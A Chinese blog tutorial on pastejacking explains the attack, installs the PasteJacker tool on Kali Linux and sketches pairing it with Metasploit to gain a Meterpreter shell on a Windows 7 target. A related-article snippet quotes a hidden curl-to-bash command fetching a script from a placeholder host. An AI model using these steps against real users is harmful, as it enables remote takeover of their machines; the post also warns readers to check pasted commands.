KaliLinux-剪切板攻击-PasteJacker工具的安装

最新推荐文章于 2023-10-18 16:30:25 发布
最新推荐文章于 2023-10-18 16:30:25 发布
阅读量2.8k 收藏 20
点赞数 2
分类专栏: # Kali Linux 文章标签: PasteJacker 剪切板攻击 剪切板 KaliLinux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44257023/article/details/123591512
版权

剪切板攻击

剪切板攻击,这个攻击其实就是当你在网页上或者其它地方复制了其中的消息或者文本,触发了复制的事件,根据这个事件来对剪切板的内容进行修改,而且这个剪切板的攻击,也是有条件的,比如Windows上得需要在 cmd 命令窗口执行,Linux系统终端执行,才会触发的,粘贴到记事本上是不会触发的,所以不要在不良网站上复制什么东西后在命令窗口执行,要在记事本之类的软件上看看复制的内容是否符合你要的内容以及是否对你的系统有危险行为

在kali中安装 PasteJacker 工具

第一步首先查看一下是否安装了 pip

由于我是用python3 安装的所有我执行如下命令

pip3 --version

如果你是 python2.x 的用下面查看

pip --version

查看版本,有结果说明你是有pip的就不需要安装了

如果没有如下操作

保障可以联网!!!
我习惯把官方或者GitHub地址先展示出来,防止下载错误
官网下载地址:https://pypi.org/project/pip/
在这里插入图片描述

下载pip

-o 会下载你当前目录下 一个叫 get-pip.py 的文件
下载命令:

curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py

等待下完即可,看网速了
在这里插入图片描述

安装pip

提示: 我的KaliLinux系统 2022.1的,自动python的环境的,但分python2.x 和python3.x的,我用的是3.x
用2.x 就把 3去掉即可

在你下载pip安装包的目录下执行:

python3 get-pip.py

安装的时候会出现一些问题
在这里插入图片描述
出现上图的错误就再执行 python3 get-pip.py 命令即可,这个错误可能会报个几次,多执行几次命令即可
安装完成会有一个橙黄色的提示:
在这里插入图片描述
提示大概就是推荐你使用虚拟的,不管它,执行pip3 --version 查看版本有版本说明安装成功了
查看版本,按照次操作下载的是最新版本的

pip3 --version

在这里插入图片描述

PasteJacker 工具的安装

工具GitHub地址: https://github.com/D4Vinci/PasteJacker
在这里插入图片描述

下载PasteJacker

我推荐的就是下载压缩包,毕竟没有工具上网克隆很慢,并且不稳定
进入GitHub地址,点击下载(个人建议使用火狐浏览器下载,我感觉火狐很快)
在这里插入图片描述
下载完成后拖动到,kail虚拟机里=>>并移动到你的用户目录或者你新建的目录中去,都可以==>解压
例如:

提示: /root/Desktop/ 就是桌面下 我是直接将宿主机下载好的压缩包直接拖拽到kail桌面的,我移动肯定要去桌面移动的

在这里插入图片描述

安装PasteJacker

提示: 安装可能很慢,需要下载两个软件,下载的文件倒是很小,不打算用python3.x就执行命令时把 3 去掉

python3 -m pip install ./PasteJacker-master

安装过程一般没问题,有问题就再执行一次命令,一致到提示如下图,就安装成功了
在这里插入图片描述

运行PasteJacker

第一次运行可以会出现一个问题如下图,这个是连接更新地址导致的问题
在这里插入图片描述
很简单做一下改动代码即可,最好和我下面操作的一样,不然容易出问题
我安装的时候用的是 python3 安装的 所以它会在 python3.9 文件夹下
这是我找到的目录路径: /usr/local/lib/python3.9/dist-packages/PasteJacker/Core
如果你的没在这个目录中,你可以执行一下 find / -name "dist-packages" 找一下别的python路径下
/dist-packages/PasteJacker/Core/ 这个目录是固定的下有一个 updater.py
修改 updater.py 中的代码

vim updater.py

提示:修改 updater.py 很容易出现问题,1修改前备份,2.重新安装PasteJacker即可回复updater.py文件内容

在这里插入图片描述
注释掉之后, 执行pastejacker 命令启动 PasteJacker 工具,如下图成功
在这里插入图片描述

PasteJacker的使用

使用很简单的,但也有条件的,需要在终端执行的

案例:Windows下复制文字后打开记事本

肯定要运行工具的

在这里插入图片描述
在这里插入图片描述
这里输入:2
在这里插入图片描述
这里输入打开记事本命令: notepad 你可以输入别的都可以
在这里插入图片描述
它默认是80 端口,可以更换端口,这是英文得需要人访问你生成的代码,也就是需要访问你的端口
输入完成 回车,不修改回车即可
在这里插入图片描述
输入一些信息,好让人执行复制这个操作(需要连续回车两次才会真正执行)
在这里插入图片描述

搭配msf + PasteJacker 获得win7靶机shell

首先要知道一个事情
在这里插入图片描述
演示:
在这里插入图片描述
继续 用msf 获得反弹的shell
在目录 /root/.pastejacker/ 下 有一个msf_handler.rc 文件它是记录操作,直接执行如下操作

msfconsole -r msf_handler.rc

进入之后msf直接输入 sessions 查看然后再 sessions -i 1,应为就一个机器连接了,所以输入 1 的sessions值即可,进入 meterpreter 终端,然后你懂的

在这里插入图片描述

常家壮
关注
  • 2
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
易语言-剪切板操作例程
06-29
剪切板操作
一个剪切板查看程序.rar_Shear-Warp_剪切_剪切板
09-20
一个剪切板查看程序
swift-ClipyOSX剪切板管理库
08-15
这个项目最大的亮点是 Swift OC 混编,包含各种复杂的剪切板操作,可以学习一下如何优雅地混编代码。
Kali Linux上自动安装额外的渗透测试工具-Linux开发
05-27
Kali Linux上自动安装额外的渗透测试工具WeaponizeKali.sh是一个Bash脚本,旨在自动化在Kali Linux上下载和安装用于内部渗透测试的额外工具的过程。 该项目背后的基本原则是:使用最新版本的攻击工具包来拥有其最新功能和修补程序。 在安装第三方软件时,请使用隔离的环境以最大程度地减少潜在的依赖性。 保留Windows开发脚本和二进制文件在手,以防万一您处于“脱机状态”。
Ditto-剪切板工具.exe
04-08
超级好用的Windows 10剪切板工具,能记录之前复制过的的任何东西(文本、图片、链接...),在需要重新使用时,可以调出软件直接选择粘贴即可,确实是一用就回不去了。
kali linux 通过粘贴板攻击对方服务器
QQ670663的博客
02-20 1802
模拟剪贴板劫持对目标进行攻击。简而言之,粘贴劫持是恶意网站用来控制您计算机的剪贴板并在您不知情的情况下将其内容更改为有害内容的一种方法。所以在这里所做的是自动化原始攻击并添加另外两个技巧来欺骗用户,使用 HTML 和 CSS将讨论它然后添加 meterpreter 会话。
什么是剪贴板劫持-剪贴板劫持教程
简介
07-21 2554
我来写剪贴板劫持教程。剪贴板劫持是一种危险的攻击技术,借助该攻击者可以控制受害者的剪贴板并将恶意代码粘贴到目标机器中,然后攻击者控制受害者的机器。剪贴板劫持或剪贴板劫持是恶意网站用来控制受害者计算机上的剪贴板并在受害者不知情的情况下将该内容更改为恶意内容的方法。剪贴板劫持是一种漏洞利用,其中一个人的剪贴板的内容被恶意行取代,例如指向恶意 Web 服务器的链接、恶意代码或命令。示例:用户上网,他得到了一些有用的命令。该命令由用户复制,但如果它是剪贴板劫持,则用户不会复制看起来正常的有用命令。
virtualbox中安装kali无法使用剪贴板共享的问题
CwithW的博客
12-31 1297
在virtualbox中安装kali,使用官方推荐的 apt install -y virtualbox-guest-x11 方式安装了virtualbox guest tools,之前使用一直正常,一次apt upgrade后出现剪贴板共享无法使用的问题。 使用VBoxClient --clipboard -f 提示本功能未实现。 使用一旧版kali虚拟机可以正常使用剪贴板共享,但更新vi...
kali linux 通过粘贴板监听对方服务器
qq_45876255的博客
08-16 998
kali linux 通过粘贴板攻击对方服务器 1.安装 Pastejacker 工具 下载: root@kali:~# git clone https://github.com/D4Vinci/PasteJacker.git 解压 root@piloteer-101:~# unzip PasteJacker.zip 安装 pip root@piloteer101:~# wget https://bootstrap.pypa.io/get-pip.py root@piloteer101:~# pytho
网页复制的剪切板攻击
Tesi1a的充电桩
11-07 1584
0x00 攻击场景 在网页里copy 一段shell 代码 比如: pip install frida 实际执行: bash <(curl -s -S -L http://xxx.com/xxx.sh),而且还TM的自动回车执行了。。。 0x01 实现原理: 在网页里使用js代码,改变复制的内容 <html&amp
Windows剪切板工具clipbrd.zip
10-24
Windows系统中的剪切板查看工具!win7及以上系统已经没有自带这个工具了,该工具可以在win7及以上系统中使用
Kalikali基本命令学习-(关机、帮助信息、目录、创建文件/目录、删除、重命名、剪切、查询)
最新发布
qq_20410657的博客
10-18 1395
find ./etc -type f 匹配etc目录下的所有文件类型为file的。find /etc -name ‘*.txt’ 匹配名称txt后缀的所有文档。touch cc.txt dd.txt ee.txt 创建生成多个文件。rm -rf test 删除目录及文件,忽略不存在的文件,强制删除。rm -rf /tmp/* 删除tmp下的所有内容,*匹配所有。mv test1 /tmp 将test1目录剪切到tmp目录中。mv bb.txt /tmp 将文件剪切到tmp目录。
攻击资源合集
弱水滴石的博客
02-10 5908
相关资源列表 https://mitre-attack.github.io/ mitre科技机构对攻击技术的总结wiki https://huntingday.github.io MITRE | ATT&CK 中文站 https://arxiv.org 康奈尔大学(Cornell University)开放文档 http://www.owasp.org.cn/owasp-proj...
msf概念、命令,渗透测试流程
agrilly的博客
08-10 934
msf概念、命令,渗透测试流程
【web安全学习篇2】kali基本命令
weixin_45481818的博客
10-17 992
dasd
Kali基本命令学习
2301_76310805的博客
03-11 3511
kali的基本介绍和简单命令
04【技巧linux】:Kali的操作快捷键
qq_61901169的博客
06-02 2105
Ctrl+& 恢复 ctrl+h 或者 ctrl+d 或者 ctrl+w 删除的内容。Ctrl+y 粘贴由Ctrl+u, Ctrl+d, Ctrl+w删除的单词。Ctrl+t 将光标位置的字符和前一个字符进行位置交换。Ctrl + Alt + T 打开命令行终端窗口。Ctrl + Alt + 1~4 切换桌面。Ctrl+k 删除此处至末尾的所有内容。Ctrl+u 删除此处至开始的所有内容。Ctrl+w 删除此处到左边的单词。Ctrl+shift+C 复制。Ctrl+shift+V 粘贴。
【python pip】一招解决移动python安装路径pip不可用问题
lomtom's Blog
03-12 4430
概述 所有的作死行为都要从我的电脑出问题说起,就在之前由于电脑出现严重的卡顿,我简单检测了一下我的硬件,发现是我的硬盘坏道了,所以就重新买了一个新的更大的盘。然后装了系统(有教程,见我另一篇文章【系统 win10 deepin】双系统安装(win10和deepin双系统))。 然而数据就成了最大的问题,像python这样的能直接移动就能用的我果断采取了移动,然而,这就出现了pip不能用的问题,自己...
Pastejacking - CTRL+V粘贴劫持攻击
weixin_33979745的博客
07-03 473
安全研究人员可以使用CSS附加恶意内容至剪贴板,而不必通知用户,最终诱骗他们执行不需要的终端命令。此类攻击就是众所周知的剪贴板劫持。在大多数情况下,它是无效的,除非用户在终端内复制内容。安全研究人员Dylan Ayrey上周发布了剪贴板劫持的最新版本,该攻击是将Java作为攻击媒介,而非CSS。 这种攻击被称之为粘贴劫持,他的概念验证攻击原理与旧版CSS...
vue-clipboard2可以复制图片到剪切板
06-07
是的,vue-clipboard2可以复制图片到剪切板。但是需要先将图片转换为base64编码,然后再将其复制到剪切板中。以下是一个示例代码: ```javascript <template> <div> <img :src="imageUrl" ref="image"> <button @click="copyImage">Copy Image</button> </div> </template> <script> import Clipboard from 'vue-clipboard2' export default { components: { Clipboard }, data () { return { imageUrl: 'https://example.com/image.png' } }, methods: { copyImage () { const image = this.$refs.image const canvas = document.createElement('canvas') canvas.width = image.naturalWidth canvas.height = image.naturalHeight const context = canvas.getContext('2d') context.drawImage(image, 0, 0) const base64 = canvas.toDataURL('image/png') this.$copyText(base64).then(() => { console.log('Image copied to clipboard!') }) } } } </script> ``` 在上面的代码中,我们首先将图片展示在页面上,并给按钮绑定了一个点击事件。当用户点击按钮时,我们使用canvas将图片转换为base64编码,然后使用vue-clipboard2的`$copyText`方法将其复制到剪切板中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值